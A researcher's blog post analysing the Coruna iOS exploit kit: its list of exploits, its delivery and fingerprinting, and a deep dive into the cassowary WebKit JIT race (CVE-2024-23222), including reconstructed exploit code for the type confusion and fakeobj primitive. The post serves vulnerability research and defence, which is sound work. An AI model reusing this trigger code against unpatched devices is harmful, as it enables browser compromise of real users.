Deep dive and technical analysis of the Coruna exploit framework

1. Pretext

I've had a lot of fun diving into this exploit kit in the last weeks; it really was a trip down memory lane to when I still did iOS security research as a hobby. Hanging around in voice calls and trying to figure out how each of the different stages worked was a blast, and I thought that before I forget everything, I should write it down.

If you are like me, you want to inspect every little stone as we make our way through the kit, but I also totally understand if you are here for a high-level overview. Because of this, I decided it's best to treat every subsection as standalone, which means it should be quite easy to skip any first or second level heading without losing too much context. Beyond that I also decided to make any fourth level heading collapsible and only discuss very deep technical details there, so that those can be skipped easily.

Similarly, I'm not sure how deep your level of knowledge is. Because of this, I am referencing other writeups on relevant topics in the reference section of the post.

Now enjoy :)

2. Discovery

Google-Threat-Intelligence-Group (GTIG) and iVerify both published blog posts on an exploit kit named Coruna which supports iOS 13.0 - 17.2.1. They did not provide samples, but due to GTIG publishing a list of URLs used for the attacks and some of them still being active, I was able to obtain a capture against iOS 17.1 and based my analysis on that.

2.1. GTIG & iVerify

On March 3rd, GTIG and iVerify both published blog posts about a nation-state iOS exploit kit they had been tracking for a while. It was initially used by a customer of a surveillance company and then later in waterholing attacks on Ukrainian websites and Chinese gambling websites. On one of these websites attackers hosted a debug version of the kit, allowing GTIG to obtain exploit names (and probably also a lot of debug prints which I would've loved to have). Because of this they published a nice table containing all 23 exploits, with their names, purpose, CVE etc:

Exploit type	Internal name	Targeted versions	Fixed version	CVE
WebContent R/W	buffout	13 to 15.1.1	15.2	CVE-2021-30952
WebContent R/W	jacurutu	15.2 to 15.5	15.6	CVE-2022-48503
WebContent R/W	bluebird	15.6 to 16.1.2	16.2	No CVE
WebContent R/W	terrorbird	16.2 to 16.5.1	16.6	CVE-2023-43000
WebContent R/W	cassowary	16.6 to 17.2.1	16.7.5, 17.3	CVE-2024-23222
WebContent PAC bypass	breezy	13 to 14.x	?	No CVE
WebContent PAC bypass	breezy15	15 to 16.2	?	No CVE
WebContent PAC bypass	seedbell	16.3 to 16.5.1	?	No CVE
WebContent PAC bypass	seedbell_16_6	16.6 to 16.7.12	?	No CVE
WebContent PAC bypass	seedbell_17	17 to 17.2.1	?	No CVE
WebContent sandbox escape	IronLoader	16.0 to 16.3.1 (16.4.0 for <= A12)	15.7.8, 16.5	CVE-2023-32409
WebContent sandbox escape	NeuronLoader	16.4.0 to 16.6.1 (A13 - A16)	17.0	No CVE
PE	Neutron	13.X	14.2	CVE-2020-27932
PE (infoleak)	Dynamo	13.X	14.2	CVE-2020-27950
PE	Pendulum	14 to 14.4.x	14.7	No CVE
PE	Photon	14.5 to 15.7.6	15.7.7, 16.5.1	CVE-2023-32434
PE	Parallax	16.4 to 16.7	17.0	CVE-2023-41974
PE	Gruber	15.2 to 17.2.1	16.7.6, 17.3	No CVE
PPL Bypass	Quark	13.X	14.5	No CVE
PPL Bypass	Gallium	14.x	15.7.8, 16.6	CVE-2023-38606
PPL Bypass	Carbone	15.0 to 16.7.6	17.0	No CVE
PPL Bypass	Sparrow	17.0 to 17.3	16.7.6, 17.4	CVE-2024-23225
PPL Bypass	Rocket	17.1 to 17.4	16.7.8, 17.5	CVE-2024-23296

This is the table as GTIG has published it, there are two minor things I'm not sure about anymore: Based on the selection code it seems like buffout might've been exploitable since iOS 11 and Rocket is listed under the 17.4 security bulletin. But the exploit is bailing earlier if the iOS version is older than iOS 13 so I don't have proof that buffout is exploitable on lower ones. As we will see during the analysis of seedbell I also now know that all of the seedbell variants have been patched in iOS 18.0 beta 1.

Besides this table, very little information was published about the vulnerabilities themselves, but GTIG mentioned that they are going to publish RCAs at a later point, so once that happens I will for sure link them here. An in-depth analysis of the implant has already been done by both iVerify and GTIG, which is why I won't focus on it in this post.

2.2. Obtaining a sample

When the posts were released I was very excited, mainly because there hadn't been any large publications on iOS exploitation lately, but also because the table had some entries with no CVE and not even a fixed version indicating to me that no root-cause analysis (RCA) had been done on these vulnerabilities yet. I especially was interested in the seedbell PAC bypass, as I had done a lot of research into usermode PAC in the past.

But given that neither GTIG nor iVerify published any samples, initially looking at them myself didn't seem to be possible, but then I got word that some of the URLs listed in GTIG's post were still active and people were voluntarily infecting themselves in the hopes of a jailbreak. This is a very bad idea, and I still don't understand why GTIG published actively serving URLs, but it allowed me to obtain a sample and conduct this analysis. It will also likely enable a jailbreak on early versions of iOS 17. So I think generally speaking, I welcome GTIG sharing samples, but ideally this should happen in a controlled fashion where they can, for example, leave out the JIT loader or the initial RCE stage to not allow others to easily weaponise the kit, but still allow the exploits to be analysed and used in a jailbreak, which can then be used to do better analysis of future chains.

Thanks to Alfie I was able to obtain a raw capture against a phone running iOS 17.1. During initial analysis I thought that I'd eventually hit a wall because the exploit kit would do a Diffie-Hellman key exchange and then encrypt the next stages, but, as we will see, to my surprise this wasn't the case.

The capture had the following files in it:

377bed7460f7538f96bbad7bdc2b8294bdc54599.js
4817ea8063eb4480e915f1a4479c62ec774f52ce.min.js
4a75f0551eba446b4fa35127024a84b71d9688d6.js
6beef463953ff422511395b79735ec990bed65f4.js
7a7d99099b035b2c6512b6ebeeea6df1ede70fbb.js
9af53c1bb40f0328841df6149f1ef94f5336ae11.js
bef10a7c014b826e9dd645984e80baf313c1635f.js
favicon.ico
group.html

It comes from one of the Chinese gambling websites, so I have their version of the kit and their implant. The other variants of the kit might be different, but based on the background, I doubt that either deployment made large changes.

2.3. Related operations

In a very interesting turn of events, around three weeks later on the 18th, GTIG, iVerify and Lookout all published blog posts about another iOS exploit kit called "DarkSword". This was found by Lookout by following the C2 infrastructure of Coruna and finding a similar looking domain on the same IP address that served another exploit kit. Based on the kit being later also leaked on GitHub I assume that others did the same. So not only did GTIG expose actively serving URLs of Coruna, but this also allowed the discovery of another kit. Because DarkSword is fully written in JavaScript and not obfuscated at all, it is a lot easier to analyze and there already are some writeups available on it (for example on the kernel vulnerability). I might still decide to do another writeup on it and link it here if I have time for it.

While DarkSword was used by the same operator as Coruna, the two kits are so different and there is so much engineering around Coruna that a developer would reuse that I don't think they were both developed by the same entity. Instead it seems like the operator sourced the kits from two different sources.

3. Technical analysis

In this section I'll do a full analysis of the kit, starting with the landing page and ending with the SPTM/PPL bypass. Having only access to an iOS 17.1 capture, this analysis is limited to the exploits used in that version of the kit, so cassowary (WebContent R/W), seedbell_17 (PAC bypass), Gruber (kRW) and Rocket (PPL/SPTM bypass). I didn't have a look at Sparrow (PPL bypass - yet ;). I will not go into the implant itself, as that has already been analysed in depth by both GTIG and iVerify. Besides the exploits themselves, I'll also cover a lot of the infrastructure around them as well as intermediate stages, like the MachO loading framework.

Cassowary is a race condition between the JIT compiler thread and the main thread, which gets turned into a type confusion. This is then escalated to the classic fakeobj and addrof primitives and from there through 3 stages to full R/W in the WebContent process. Afterwards the framework detects PAC and, if present, uses seedbell_17 to get a PACIZA signing primitive, which is then escalated to an 8-argument function calling primitive. With the ability to call arbitrary functions and full R/W in the WebContent process, the kit then uses a module to load a MachO file into memory and execute it. This MachO file will communicate with JavaScript through a shared memory buffer and download a configuration file as well as two more stages of which the latter contains the kernel LPE Gruber and the PPL/SPTM bypass Rocket. Gruber is a race condition in the vm subsystem that drops a reference on a vm_object, which is then turned into a pUAF and escalated into a physical mapping primitive for kernel R/W. Afterwards the GFX coprocessor is used to bypass PPL/SPTM with Rocket, creating a self-referencing page table entry that then allows the kit to write to any physical address. From there the implant is loaded, which I have not analysed further.

3.1. Delivery (+ JS Framework)

This section covers the delivery mechanism of the exploit kit as well as the main JavaScript framework that orchestrates the exploitation, by loading different modules for the exploit stages. The modules themselves are further explored in the next sections.

3.1.1. group.html

The exploit kit was delivered on group.html which can be divided into the following components:

html meta tags to disable caching of the page
one script tag with two distinct sections that delivers the exploit
google and cloudflare tracking links

3.1.2. embedded JavaScript

The embedded JavaScript is divided into two sections: the first is doing the actual exploitation, while the second one is doing fingerprinting. It's minified and slightly obfuscated, namely there are three techniques employed:

variable names are replaced with meaningless strings, generally speaking this mapping seems to be done deterministically as it's stable across source files
Integers are often obfuscated by turning them into a simple expression (mostly xor) for example (1163411831 ^ 1146639985)
many strings are converted into [115,118,...,39,32,114].map(p=>String.fromCharCode(p^66)).join("") with a random XOR key

I wasn't able to link the obfuscation patterns to a known public obfuscator (the closest I got was Metasploit's, but it seems to be a custom one).

3.1.2.1. Writing a "deobfuscator"

(click to expand)

There is nothing that can be done against the variable renaming, but for the integers and strings I decided to write a couple of regexes and then evaluate the expressions in place:

    const stringRegex = /\[\d+(, ?\n?\d+)*\]\.map\((.) ?=> ?({return )?String\.fromCharCode\(\2 ?\^ ?(\d)+\)(;?})?\)\.join\(""\)/g;
    const xorRegex = /\(-?(\d){3,} \^ -?(\d){3,}\)/g;
    const addRegex = /\(-?(\d){3,} \+ -?(\d){3,}\)/g;

    const matches = [...fileText.matchAll(stringRegex)];
      for (const match of matches) {
        const expr = match[0];
        let replacement = '';
        try {
          replacement = eval(expr);
        } catch (e) {
          replacement = expr;
        }
        replacement = "\"" + replacement + "\"";
        output = output.replace(expr, replacement);
      }
      ...

After that I ran the deobfuscated minified JavaScript through js-beautify and then started reversing it in an IDE that supports variable renaming, trying as much as possible to keep track of the original variable names in comments so that I could still cross reference them in between JS files.

The second section only does fingerprinting, so to quickly summarise it, after 1s it will:

check if the browser is vulnerable and if so:
get the IP address of the client
get the OS version from the user agent
send this information off to the server

The first section will initialise one big object I named dispatcher that is responsible for managing multiple different JavaScript modules. It already ships with two modules, which are encoded as base64 strings, but also has support for loading new ones later either by passing base64 to it or via XMLHttpRequest.

The modules can be accessed via their hash, the two loaded ones are:

57620206d62079baad0e57e6d9ec93120c0f5247: a misc helper lib
14669ca3b1519ba2a8f40be287f646d4d7593eb0: the main exploit module

Based on their length, these hashes should be SHA1, but I wasn't able to find any matching string that would hash to them. As GTIG mentioned that they have a debug version of this kit, I'm wondering if hashes are generated on that version or if with that we would be able to get the real names.

3.1.2.2. The helper module

(click to expand)

The helper module contains classes to deal with numbers, as JavaScript cannot represent 64-bit integers natively. There is one class to save a 64-bit number in two 32-bit parts and then deal with inputs and outputs for JSValues, floats or BigInts and do basic math operations on it. A second class exists for converting between the different types using the well-known trick of having an ArrayBuffer being shared between different types of JS arrays and a dataview. Besides that there are functions to deal with different strings, basically converting between UTF16 and UTF8, byte arrays and doing string decompression based on LZW-like compression. There is also some glue code that mainly glues together different types of number representations. That's something I noticed with this kit in general: there are often multiple different implementations of the same logic, likely because different developer teams worked on different parts of the chains and later they had to integrate all of them together and then didn't do the proper engineering work to unify the codebase.

Outside of the large dispatcher object the main script will set a base URL for the dispatcher to fetch the modules from and a cookie, which according to the blog posts is unique per victim. The cookie gets prepended to the module's hash and then a SHA1 hash of the whole thing is calculated by a JS SHA1 implementation, ".js" is added to it and the module is fetched from the base URL.

After 10ms (presumably to have the remainder of the page loaded) the main function is invoked and upon return its return value is sent back to the server. The main function will initialise the main exploit module which allows for the following configuration:

a url to send logging data to (this is not set for this deployment of the kit)
the resource url to later fetch the configuration and dylibs (MachO Linker, LPE and implant) from
the ChaCha20 key that is used to decrypt all fetched dylibs/configuration (this key is hardcoded in the script)
a boolean to allow continuation under a headless browser/automation (false under deployment)
a boolean to enable logging (false under deployment)
navigator.platform
navigator.userAgent

This will then error out if it's not running in Safari or AppleWebKit and parses the iOS Version from the user agent. It seems like besides regular Safari, the exploit kit also has support for running from the iTunes Store, indicated by matching against the MobileStore string in the user agent in JS and also later in the LPE stage. For all of these values the code updates a global structure I called device_properties. In the final step this structure is updated with version-specific values. Interestingly the way this is done is by going over the array of versions sorted by the oldest and then letting newer versions overwrite older properties. I find this quite slick as it allows to easily update properties once they change, instead of having to fully duplicate them each time.

Afterwards the exploit main function will error out if it's running on macOS (detected via platform or TouchEvent not being present) and if the iOS version is below iOS 13. For iOS 16 and later they detect Lockdown mode (LDM) with a helper function in the main module, which will check for existence of the RTC JS interface (for example RTCPeerConnection), the existence of a WebGLRenderingContext and correct functioning of math text rendering via <math> html tags and bail if detected. Similar to that, it will also bail if the device is in a headless browser (via navigator.webdriver) or in private browsing mode (detected via indexedDB or localStorage) unless the configuration allows it to continue. I think this strongly hints at the fact that the kit has been tested in some automated setting with this detection being made non-fatal.

Once fingerprinting is done, it will select an exploit module for WebContent R/W based on the iOS version. If none can be found it will again bail (which would be the case for a device running iOS 17.3 or newer for example) and then invoke it for up to 20 tries to get R/W. In the case of this capture, e3b6ba10484875fabaed84076774a54b87752b8a is selected, which is the cassowary exploit.

With R/W it can detect PAC by comparing the higher 32 bits of a function pointer from a WebAssembly.Table and WebAssembly.Instance object; if they are the same it assumes no PAC. From this they also have a function pointer pointing into JavaScriptCore (JSC) from which they can walk back to the MachO header (searching for 0xFEEDFACF at the beginning of a page) and then read the CPU type from it to determine if they're running on ARM or Intel. This is then used to do one final pass on the configuration values to select the right exploits before the device_properties object is frozen.

If PAC is detected, it now needs to be defeated. For this, they call a helper function which will then load a PAC bypass module based on the iOS version and invoke it to export a signer object allowing the outer call to sign with any key and context from then on. For two of the PAC bypasses, besides the PAC bypass module (29b874a9a6cc9fa9d487b31144e130827bf941bb (seedbell_17) or 9db8a84aa7caa5665f522873f49293e8eebccd5c (likely seedbell_16.6)) a helper module is loaded (477db22c8e27d5a7bd72ca8e4bc502bdca6d0aba), which exports dyld shared cache parsing functionalities to the main PAC bypass module. For this capture, seedbell_17 is loaded as it targets iOS 17.1 on a device with PAC.

With the ability to R/W and call arbitrary functions, the kit wants to load native code and execute its LPE. For this it will load a final JavaScript module (in this capture, c03c6f666a04dd77cfe56cda4da77a131cbb8f1c) which then performs a JITBox bypass and uses a blob of shellcode to link a MachO (that is stored compressed inline as base64) and then uses JavaScript to fetch a configuration and two more dylibs that are loaded and executed, the latter of which is the PE.

Generally, the design is quite interesting: they maintain JS code execution while executing native code on another thread and use an array to communicate between the two. I'll further elaborate on this in the section about the MachO loader framework.

And that's the whole chain, let's have a look at the modules in detail:

3.2. WebKit R/W

Note: This is the first JSC JIT bug I have ever looked at in depth, so details might be a bit off. I'm more than happy to incorporate any corrections and will also link to other writeups should they come out.

The bug is a weakness in the property watchpoint mechanism of JSC, that can be turned into a type confusion by racing the compiler thread against the main thread leading to tryGetConstantProperty succeeding during Control-Flow-Analysis (CFA), but failing during Constant Folding. This is then escalated to the classic fakeobj and addrof primitives and from there escalates from a relative write to an absolute one via array butterflies, and then to full R/W via WebAssembly (wasm) globals.

And don't worry—half of the terms in the paragraph above I also didn't understand going into this, which is why I specifically wrote the next section to explain some concepts in more detail before talking about the bug, exploitation and escalation to R/W.

3.2.1. Information needed to understand the bug

In order to have a full understanding of what is going on, we have a lot of ground to cover. I'll try to summarise my whole mental model here, both to help less experienced people understand better but also to potentially uncover flaws in it from more experienced people. With this being said, the whole process is way too complex to do it justice in a single section so I highly recommend reading this very long but also very good blog post on JIT in JSC and potentially this blog post series as well, which helped me understand some of the different JIT stages better.

JavaScript is a weakly typed language, this means that the same variable can hold values of different types during runtime. For example, a variable can initially hold an integer and then later hold a string. Because of this, even simple operations like addition can have very complex implementations as they need to take into account the different variable types ("adding" two strings concatenates them for example). This makes JS execution quite slow, but with performance requirements of modern web applications there is the need to somehow go faster. To speed up execution, all modern browsers have a Just-In-Time (JIT) compiler, which takes the JS bytecode (intermediate representation of the JS code used by the interpreter) and compiles it to native machine code. Then, after compilation has finished, the browser will jump to the compiled code and execute it instead of interpreting the bytecode, which is much faster. But even that is not enough because it basically just means web developers will write more code that will cause websites to lag again, so on top of this already very complex compilation process, the JIT does a lot of optimisation work to make the code run faster, which in turn creates a lot more complexity and thereby attack surface for bugs.

As compilation itself is also a compute expensive process, the JIT will only compile "hot" code, which is code that is executed multiple times, and in JSC a function is "tiered up" through various different JITs that do more and more aggressive optimisations to have a good trade off between compilation time and time saved due to faster execution.

Besides reducing the chance of wasted work, this also allows the runtime to gather (type) information about the code in a so-called profiling phase, which can then be used to do better optimisations in the actual compilation phase, leading to yet another performance gain.

There is one more part of the type system important to understand this bug: JS objects are again a very generic type, which can be used in many different ways and based on that should have different optimisations applied to them. Because of this, in JSC all objects hold a pointer to a so-called structure, which contains a description of the object, specifically for which properties the object holds and where they are stored within it.

To make a more concrete example, if we have an object obj with two properties prop1 and prop2, this object will have a pointer to a structure that then states: prop1 is stored inline at offset 0x10 and prop2 is stored inline at offset 0x18. When the JS program now accesses obj.prop1, the runtime will read the structure pointer, find prop1 in it and thereby its offset in the object and then read the value from that offset. Multiple objects can have the same structure, but the type system can only move forward, in the sense that, if you add a new property to an object it will transition to a new structure, but if you delete the same property again it will not transition back to the old structure, but to yet another new one.

During JIT compilation there are multiple phases, the relevant ones for us are Control Flow Analysis (CFA) and Constant Folding. During CFA the JIT turns type predictions into type proofs for example allowing an add operation to only emit the integer addition instruction, if it can prove that both operands are always integers (and will not overflow). Constant Folding is an optimisation that allows the JIT to precompute values during compilation, for example if we have let a = 1 + 2; the JIT can precompute the value of a to be 3 and just emit that instead of the addition instruction.

This goes beyond just simple arithmetic operations in JSC, for example if we have let a = obj.prop1; and the JIT can prove that obj always has the same structure and that prop1 is always stored at offset 0x10, it can load from obj + 0x10 instead of doing the full property access logic, which is much faster.

JSC goes even further and tries to predict if obj.prop1 is always the same value, for example if prop1 is always 1.1, it can just precompute the value of a to be 1.1 and emit that instead of the load instruction. While for the less complex case one can easily see how a runtime check can suffice for validation (if (struct(obj1) != S1) {fallback();}) for the more complex case, this is hard to solve via a runtime check. Because of this, the JIT has another feature called watchpoints, which it can set on objects. If during runtime such a watchpoint is then triggered the runtime will invalidate the compiled code and fall back to the interpreter. These work nicely complementary to runtime checks because while runtime checks have to be inside of the hot function and thereby run each time the function is called, watchpoints can be set on operations that are very unlikely to happen and then the runtime check doesn't need to be emitted, because it's guaranteed that if they ever trigger the code will be invalidated. So watchpoints allow for even more aggressive optimisations like the one above.

There are two types of watchpoints relevant for us: property replacement watchpoints and structure transition watchpoints.

Property watchpoints fire when a property of an object is changed, for example if we have obj.prop1 = 1.1; and then later obj.prop1 = 2.2; and in between, the JIT decided to watchpoint prop1, the second assignment will trigger the watchpoint and thereby invalidate the compiled code.

Structure transition watchpoints fire when the structure of an object changes, for example if we have obj.prop1 = 1.1; and then later delete obj.prop1; obj will transition to a new structure and if the JIT had set a watchpoint on the old structure it will fire and invalidate the compiled code. Importantly, transition watchpoints can only be set on "leaf" structures, which are structures that have no children in the structure tree, meaning that they are not the source of any transition. The main rationale behind this, from my understanding, is that if a structure has children in the tree, there is a very good chance that this watchpoint would trigger thereby invalidating the code, which would be so expensive that the JIT prefers to then not do the optimisation in the first place.

3.2.2. The bug

Cassowary was fixed as CVE-2024-23222 and the Apple advisory states

WebKit
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later
Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited.
Description: A type confusion issue was addressed with improved checks.
WebKit Bugzilla: 267134
CVE-2024-23222

From that we get the Bugzilla ID 267134, the report is still classified, but we can find the commit that fixed the issue in the Webkit repository:

64714692967ad278155fcae66c5cb0f853b3bf34: fixing the bug
66f60deae730514621d3f9c5e620aaa76e03f8f8: follow up (realising that some code is unneeded and can be removed from my understanding)

3.2.2.1. Commit messages

(click to expand)

commit 64714692967ad278155fcae66c5cb0f853b3bf34
Author: Yusuke Suzuki <censored>
Date:   Thu Jan 25 01:25:49 2024 -0800

    [JSC] DFG constant property load should check the validity at the main thread
    https://bugs.webkit.org/show_bug.cgi?id=267134
    rdar://120443399
    
    Reviewed by Mark Lam.
    
    Consider the following case,
    
        CheckStructure O, S1 | S3
        GetByOffset O, offset
    
    And S1 -> S2 -> S3 structure transition happens.
    By changing object concurrently with the compiler, it is possible that we will constant fold the property with O + S2.
    While we insert watchpoints into S1 and S3, we cannot notice the change of the property in S2.
    If we change O to S3 before running code, CheckStructure passes and we can use a value loaded from O + S2.
    
    1. If S1 and S3 transitions are both already watched by DFG / FTL, then we do not need to care about the issue.
       CheckStructure ensures that O is S1 or S3. And both has watchpoints which fires when transition happens.
       So, if we are transitioning from S1 to S2 while compiling, it already invalidates the code.
    2. If there is only one Structure (S1), then we can keep the current optimization by checking this condition at the main thread.
       CheckStructure ensures that O is S1. And this means that if the assumption is met at the main thread, then we can continue
       using this code safely. To check this condition, we added DesiredObjectProperties, which records JSObject*, offset, value, and structure.
       And at the end of compilation, in the main thread, we check this assumption is still met.

commit 66f60deae730514621d3f9c5e620aaa76e03f8f8
Author: Yusuke Suzuki <censored>
Date:   Thu Jan 25 01:25:49 2024 -0800

    [JSC] Remove DFGDesiredObjectProperties
    https://bugs.webkit.org/show_bug.cgi?id=267134
    rdar://120443399
    
    Reviewed by Mark Lam.
    
    When we limit the structure only one, there is no way to change the property without firing
    property replacement watchpoint while keeping object's structure as specified. So removing DFGDesiredObjectProperties.

The change is in a function called tryGetConstantProperty which is responsible for getting a value given a base and offset while validating that base is in a set of structures and guaranteeing that value doesn't change after returning.

For this the old function first placed property replacement watchpoints on all the structures in the set, then took the cell lock on base and validated that the structure of base is in the set. Should all of that hold, it would use getDirectConcurrently to read the value from base + offset and return it. The rationale being that value couldn't change without one of the property replacement watchpoints firing and invalidating the code or if the structure of base was changed a runtime check would not pass and the code would fall back to the interpreter for this object. What the developers missed is that base could be transitioned to a structure that is not in the set, have its properties modified and then transitioned back to a different structure in the set, which allows modifying the value without firing any watchpoint and still passing the runtime check.

The fix for this was to further restrict this optimisation to:

the set only having one structure - because structure transition is only "forward" we can never leave this structure, do a modification and then come back to it, so this is safe
all structures in the set are transition watched - because then again we can not transition away from the structure without firing a watchpoint thereby invalidating the code

3.2.3. Exploiting the bug

In this section we will explore the exploitation based on a deobfuscated and cleaned up version of the code.

Before we start, I want to mention that generally these exploits are developed in a closed-loop fashion, where the developer "dances" with the JIT till it gives them a desired code gen. Because of that some of the code might be a leftover from that process and might not be strictly needed for the exploit to work.

This is important to keep in mind since it means that there might not be a good rationale for every single line, but I'll still attempt to provide one.

The high-level idea of exploitation is to poison the JIT compiler's type information by having tryGetConstantProperty succeed during CFA and return a float array, but then during runtime actually run the function on an array of objects. This way they can then do optimised float operations on pointers, easily creating a fakeobj primitive. Specifically, cassowary will add 0x10 to a pointer to move it from the beginning of the object, where the JSCell header and the butterfly pointer sits, to the first inline property that is fully attacker controlled and will be interpreted as a JSCell header on access of the misaligned pointer.

This basically leads to the following code pattern that they build the exploit around:

let i32Arr = new Uint32Array(2);
let f64Arr = new Float64Array(i32Arr.buffer); // share the same buffer with i32Arr
function jitted_func() {
    // do magic
    // [...]
    let typeConfused = obj.p1 // thanks to CFA the JIT thinks obj.p1/typeConfused is always a 64 bit float array, in reality we pass an array with object pointers
    f64Arr[0] = typeConfused[1]; // because of this, this here becomes a simple store so we store the pointer as a float into the array
    i32Arr[0] = i32Arr[0] + 16; // then we increment the pointer by 0x10 (i32Arr and f64Arr share the same buffer/operate on the same memory)
    typeConfused[1] = f64Arr[0]; // and then we store it back, because of the type confusion this is again a simple store, but now in the original array we have a pointer to the first property of the object instead of the JSCell header

Now in order to trigger this bug obj needs to be observed as either structure type S1 or S3 and tryGetConstantProperty to succeed during CFA. For this the exploit first creates a structure tree/chain with 3 structures: S1 -> S2 -> S3 (in reality this chain has some more temporary structures that I omit for simplicity).

function newTarget() {} // single constructor to have both structS1 and structS3 share the same structure type
let structS1 = Reflect.construct(Object, [], newTarget);
let structS3 = Reflect.construct(Object, [], newTarget);
// at this point structS1 and structS3 have the same structure
structS1.p1 = floatArrWProp1;
structS1.p2 = floatArrWProp1;
structS3.p1 = 0x1337;
structS3.p2 = 0x1337;
// now again structS1 and structS3 have the same structure, which is our "S1"
delete structS3.p2;
// this transferred structS3 to our "S2"
delete structS3.p1;
structS3.p1 = 0x1337;
structS3.p2 = 0x1337;
// and now it is our final "S3" structure

They then need to train the runtime to see obj as either S1 or S3, but at the same time they need to avoid certain optimisations. For this they create the following construct around the code above

function toJIT(useS3) {
    let obj = structS1;
    if (useS3) {
        obj = structS3;
        (0)[0]
    }
    let typeConfused = obj.p1;
    if (useS3) typeConfused = floatArrWProp2;
    f64Arr[0] = typeConfused[1];
    i32Arr[0] = i32Arr[0] + 16;
    typeConfused[1] = f64Arr[0];
}

Now I'm not 100% sure why this exact construct is needed, but I can tell you that (0)[0] acts as a "JIT barrier". Usually the JIT would just optimise this code away during the dead code elimination phase, but it seems like having a constant integer base prevents it from doing this optimisation (I assume because no regular JS code has it), which means it has to emit a raw property access with potential side effects. This heavily incentivises the JIT to not do an optimisation should useS3 be true and in later tier-ups we also see it only emit code for the S1 case and fall back to the interpreter for the S3 one, but during type observation it will still see both cases and because of this create the structure set for obj as {S1, S3}.

The original exploit also had "uo" in obj; right above the property access, but the bug still gets triggered without it. I assume it was placed there to force the JIT to emit the structure runtime check there, but that's pure speculation on my part.

There is one more caveat to this: after CFA the compiler will also have the constant folding pass, which will again call tryGetConstantProperty with the exact same parameters as CFA and so it will also succeed and return a float array. And then the JIT will go ahead and fold the value of p1 into the generated code instead of emitting a property access. This is what turns the attack into a race because the exploit needs CFA to succeed in the tryGetConstantProperty call but then fail during constant folding. Fortunately this is easily achievable by changing the structure type of obj on the main thread in between the two calls, because tryGetConstantProperty will bail if the structure of obj is not in the expected set, leading to the JIT emitting a property access instead of folding the value, but still operating on the wrong type information from the CFA phase.

Putting it all together, invocation of the function looks like this:

const jitIterTotal = 0x1000000;
const jitIterTrain = 0x20000;
for (let jitIterCnt = 0; jitIterCnt < jitIterTotal; jitIterCnt++) {
    if (jitIterCnt > jitIterTrain) {
        toJIT(false,true); // forcing compilation
    }else{
        toJIT(jitIterCnt % 2 && jitIterCnt < 256, jitIterCnt > 4096); // training
    }
    if (jitIterCnt == jitIterTrain) {delete structS1.p2;} // triggering structure transition to S2
}
// and then modify p1 outside of S1/S3 to avoid watchpoints
delete structS1.p1;
structS1.p1 = fakeFloatArr;
structS1.p2 = 1;
// structS1 is now S3 (to bypass the runtime check)
toJIT(false, false); // trigger

Where the second parameter is a fast path to completely skip execution in the function presumably to not disturb the type information. fakeFloatArr is created like this prior to the loop:

let victimObj = {prop1: 1, prop2: 2};
let fakeFloatArr = [1.1, victimObj];

And when the bug successfully triggers, fakeFloatArr will be interpreted as a regular float array and fakeFloatArr[1] will no longer point to victimObj, but instead to the first property of victimObj, which is fully attacker controlled and can be used as a fake object primitive.

On its own this will have a very hard time triggering the bug as the race window between the two compiler phases is very hard to hit from JS. Because of this the exploit pads the function around the important code with dummy code to slow down the compilation process and with that basically gives it an ~80% hit rate on my machine. The dummy code is just a simple loop that isn't easy to optimise out: while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;

One more thing the exploit does I don't have an explanation for is triggering an Eden GC right after the JIT code is generated:

for (let t = 0; t < 0x100000; t++) new Array(13.37, 13.37, 13.37, 13.37);

I think it might serve two purposes:

it will delay execution between the JIT hot loop and the trigger, this increases (the arguably already very high chance) that the function is available as jitted code
it will clean the Eden heap and as we will see in the next phase the code then does heap sprays so a clean heap state will drastically help there

But the bug can be triggered without it.

3.2.3.1. Confirming theories and experimentation with the bug

(click to expand)

In order to confirm the bug I used --dumpAirGraphAtEachPhase=true to dump the Air assembly of a successful and unsuccessful run and then compare the two.

While doing so I saw that in the unsuccessful case we constant fold the value of floatArrWProp1 into the function:

Air BB#8: ; frequency = 1.000000
Air   Predecessors: #6, #7
Air     Move $0x101031390, %x0 ; folded constant
Air     Move (%x0), %x0
Air     Move32 -8(%x0), %x1
Air     Patch &Branch32(3,SameAsRep)3, BelowOrEqual, %x1, $1, $0x101031388
Air     MoveDouble 8(%x0), %q0
[...]

Because of this I got the idea that tryGetConstantProperty is likely invoked multiple times but fails in the constant folding phase.

I decided to confirm that with lldb by setting a breakpoint on tryGetConstantProperty and indeed it was hit multiple times.

To now fully confirm the theory that the reason of different code gen is that function I used this breakpoint:

(lldb) break set -n tryGetConstantProperty
(lldb) break command add
> bt
> break set -o -a $lr -C "reg read x0" -C "c"
> c
> DONE
(lldb) c

Leading to the following output (filtered by "x0 ="):

      x0 = 0x0000000101031388       x0 = 0x0000000101031388
      x0 = 0x0000000101031388       x0 = 0x0000000101031388
      x0 = 0x0000000000000000       x0 = 0x0000000000000000
      x0 = 0x0000000000000000       x0 = 0x0000000000000000
      x0 = 0x0000000101031388       x0 = 0x0000000101031388 <--- [0]
      x0 = 0x0000000000000000       x0 = 0x0000000101031388 <--- [1] difference
      x0 = 0x0000000000000000       x0 = 0x0000000000000000
      x0 = 0x0000000000000000       x0 = 0x0000000000000000
      x0 = 0x0000000000000000       x0 = 0x0000000000000000
      x0 = 0x0000000000000000       x0 = 0x0000000000000000
      x0 = 0x0000000000000000
      x0 = 0x0000000000000000
      x0 = 0x0000000000000000
      x0 = 0x0000000000000000
      x0 = 0x0000000000000000
      x0 = 0x0000000000000000
      x0 = 0x0000000000000000
      x0 = 0x0000000000000000
      x0 = 0x0000000000000000
      x0 = 0x0000000000000000
      x0 = 0x0000000000000000
      x0 = 0x0000000000000000

And indeed looking at the backtraces [0] is in CFA and [1] is in the constant folding phase.

A successfully type confused version generates the following air assembly:

    Air BB#8: ; frequency = 1.000000
Air   Predecessors: #6, #7
Air     Move 8(%tmp20), %tmp37                  ; load structS1 butterfly
Air     Move -16(%tmp37), %tmp25                ; load p1 from butterfly
                                                ; v-- bail on bad cell tag
Air     Patch &BranchTest64(3,SameAsRep)1, NonZero, %tmp25, 0xfffe000000000002, %tmp25, %tmp25
Air     Move 8(%tmp25), %tmp24                  ; get p1 butterfly
Air     Move32 -8(%tmp24), %tmp34               ; load publicLength from butterfly
Air     Move $1, %tmp35                         ; [1] index
